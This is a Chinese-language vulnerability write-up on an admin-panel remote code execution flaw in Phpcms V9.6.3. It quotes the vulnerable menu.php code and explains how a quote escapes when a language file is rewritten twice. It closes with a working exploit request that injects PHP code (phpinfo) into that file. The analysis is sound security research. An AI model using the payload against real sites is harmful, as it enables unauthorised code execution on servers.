Phpcms V9.6.3 后台远程命令执行漏洞
一、漏洞简介
二、漏洞影响
Phpcms V9.6.3
三、复现过程
漏洞分析
漏洞代码位于 /phpcms/modules/admin/menu.php
第 81 行
function edit() {
if(isset($_POST['dosubmit'])) {
$id = intval($_POST['id']);
//print_r($_POST['info']);exit;
$r = $this->db->get_one(array('id'=>$id));
$this->db->update($_POST['info'],array('id'=>$id));
//修改语言文件
$file = PC_PATH.'languages'.DIRECTORY_SEPARATOR.'zh-cn'.DIRECTORY_SEPARATOR.'system_menu.lang.php';
require $file;
$key = $_POST['info']['name'];
if(!isset($LANG[$key])) {
$content = file_get_contents($file);
$content = substr($content,0,-2);
$data = $content."\$LANG['$key'] = '$_POST[language]';\r\n?>";
file_put_contents($file,$data);
} elseif(isset($LANG[$key]) && $LANG[$key]!=$_POST['language']) {
$content = file_get_contents($file);
$content = str_replace($LANG[$key],$_POST['language'],$content);
file_put_contents($file,$content);
}
$this->update_menu_models($id, $r, $_POST['info']);
//结束语言文件修改
showmessage(L('operation_success'));
} else {
. . . . . .
}
}
这段代码是修改语言文件用的,而这个语言文件就是 /phpcms/languages/zh-cn/system_menu.lang.php
里面一堆类似 $LANG['video'] = '视频';
的东西
当时用 rips 扫描发现的大多是
$data = $content."\$LANG['$key'] = '$_POST[language]';\r\n?>";
这种拼接操作,而且 POST 中的单引号会被转义,无法逃逸
转义代码位于 /phpcms/libs/classes/param.class.php
public function __construct() {
if(!get_magic_quotes_gpc()) {
$_POST = new_addslashes($_POST);
$_GET = new_addslashes($_GET);
$_REQUEST = new_addslashes($_REQUEST);
$_COOKIE = new_addslashes($_COOKIE);
}
}
而这里突然看到一个 str_replace ,
str_replace($LANG[$key],$_POST['language'],$content)
,感觉可能会有漏洞
一番胡乱测试之后惊奇的发现网站 500 了,细看原来是单引号逃逸导致报错
下面是漏洞分析过程
首先要登录后台拿到 pc_hash 的值,这个是防止提交恶意数据的,后台首页 F12 就能看到
然后访问:
http://www.0-sec.org:9000/index.php?m=admin&c=menu&a=edit&pc_hash=wCuF7w
phpcms 的路由和那个 yzmcms 差不多,m 是模块名,对应 /phpcms 下的文件夹,c 是控制器名,对应 /phpcms/模块/ 下的 php 文件名,a 则对应控制器类的类函数名
发送 POST 请求:
dosubmit=1&info[name]=1&language=1
语言文件最后会新添内容
$LANG['1'] = '1';
第一次请求
发送 POST 请求:
dosubmit=1&info[name]=1&language=1'
require $file;
引入语言文件,$LANG[$key]
的值还是
NULL,所以执行拼接操作
$data = $content."\$LANG['$key'] = '$_POST[language]';\r\n?>";
file_put_contents($file,$data);
得到语言文件新添内容为
$LANG['1'] = '1\'';
?>
第二次请求
发送与第一次相同的 POST 请求
require $file;
引入语言文件得到 $LANG[$key]
的值是
string(2) "1'"
,也就是说,没有反斜杠,这样问题就出现了,我们同样的请求发送了两次,按照代码逻辑来看,是不应该更新
$LANG[$key]
的值的
但是因为 require
和 file_get_contents
函数读取之后的文件内容不含反斜杠,而我们 POST 传入的 language
会被转义处理得到的值是 string(3) "1\'"
于是判断 $LANG[$key]!=$_POST['language']
就成立了,接着 str_replace
函数进行字符串替换操作,把原来的 $LANG['1'] = '1\'';
中的 1'
替换成
1\'
,最终写入文件
结果就得到了以下文件内容,第二个单引号被反斜杠转义,无法闭合
$LANG['1\'] = '1\'';
?>
payload:
发送两次以下请求,访问语言文件 http://www.0-sec.org:9000/phpcms/languages/zh-cn/system_menu.lang.php 即可得到 phpinfo
URL:
http://www.0-sec.org:9000/index.php?m=admin&c=menu&a=edit&pc_hash=wCuF7w
POST:
dosubmit=1&info[name]=];phpinfo();//1&language=];phpinfo();//1'
参考链接
http://j0k3r.top/2019/10/09/phpcmsv9.6.3_background_rce/